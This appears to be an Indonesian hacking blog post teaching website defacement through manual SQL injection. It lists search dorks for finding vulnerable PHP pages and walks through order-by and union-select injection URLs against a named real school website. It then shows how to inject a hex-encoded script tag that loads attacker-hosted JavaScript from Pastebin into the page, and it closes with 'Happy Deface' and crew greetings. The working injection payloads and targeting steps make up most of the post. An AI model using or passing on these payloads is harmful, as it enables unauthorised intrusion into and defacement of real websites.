Tutorial SQL Injection Manual With JSO

Ditulis oleh Selasa, 28 Juli 2020 3 Komentar Edit

HELLO MATES !!!🍻


  

By : MR.KLA


Hello Mates Welcome Back !!!
Kali ini saya akan membagikan tutorial cara SQL Injection With JSO. SFX*: anjay JSO :v.
Ini cocok untuk kalian yang suka war wer wor / Chall SQL with JSO. Hal ini lumayan mudah tpi untuk orang pemalas ya susah ajg :v

Oke langsung aja

Bahan :
1. Dork :

- inurl:iniziativa.php?in=
- inurl:curriculum.php?id=
- inurl:labels.php?id=
- inurl:story.php?id=
- inurl:look.php?ID=
- inurl:newsone.php?id=
- inurl:aboutbook.php?id=
- inurl:material.php?id=
- inurl:opinions.php?id=
- inurl:announce.php?id=

2. Internet
3. Script Pastepin/JSO jadi :
<script type="text/javascript" src="Link Pastebin mu kentod"></script>

4. Hex Encode buat sc lu yang di nomer 3 sini cuk
5. Kesabaran yang dimiliki orang mancing di lumpur :v
6. Sebats & Coffee nya jangan lupa.


Langkah - Langkah :
1. Ngedork manja dulu Tapi Sans gw udh ada live target Sini Gan

2. Lalu beri tanda ' jika eror web vuln SQL



3. Setelah itu beri perintah +order+by+1--+-

4. Kita akan cari angka eror nya yaitu teruskan perintah yang di nomer 3 contoh :

+order+by+2--+-

+order+by+3--+-

Nah cari terus sampe eror ya ga. Tapi disini gw nemu angka eror nya di 8 jadinya:

http://sman28jkt.sch.id/berita.php?id=94%27+order+by+8--+-




5. Oke jika sudah nemu angka sampai web tersebut eror kita akan menambahkan perintah

+union+select+angka eror dikurangi 1  Jadinnya:

http://sman28jkt.sch.id/berita.php?id=94%27+union+select+1,2,3,4,5,6,7--+-





6. Nah kemudian akan muncul angka dios nya. Disini angka dios saya 2. Tapi disetiap web akan berbeda




7. Lalu kita akan ke hex encode nya terlebih dahulu. Masukan script mu tadi. Kemudian klik hex encode




8. Tambahkan 0x diawal angka hex encode nya lalu salin




9. Kemudian kita kembali lagi di web yang mau lu inject



10. Tadi kan angka dios saya 2 nah jadi nya tinggal ganti tuh contoh :

http://sman28jkt.sch.id/berita.php?id=94%27+union+select+1,0xangka hex encode lu,3,4,5,6,7--+-

Jadi hapus angka 2 nya lalu ganti dengan angka hex encode kalian

11. Dan Bomm!!!




Happy Deface



Thanks To :

1. </Arrows Xcode7>
2. XTOYSEC77
3. SUNEO
4. BLOWM4N
5. VAR

Greetz :
1. ANGELS CYBER MOON
2. CLOWNSEC TEAM
3. GARUDA SECURITY CYBER
4.  AND YOU :)









3 Komentar untuk "Tutorial SQL Injection Manual With JSO "

Langganan: Posting Komentar (Atom)

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel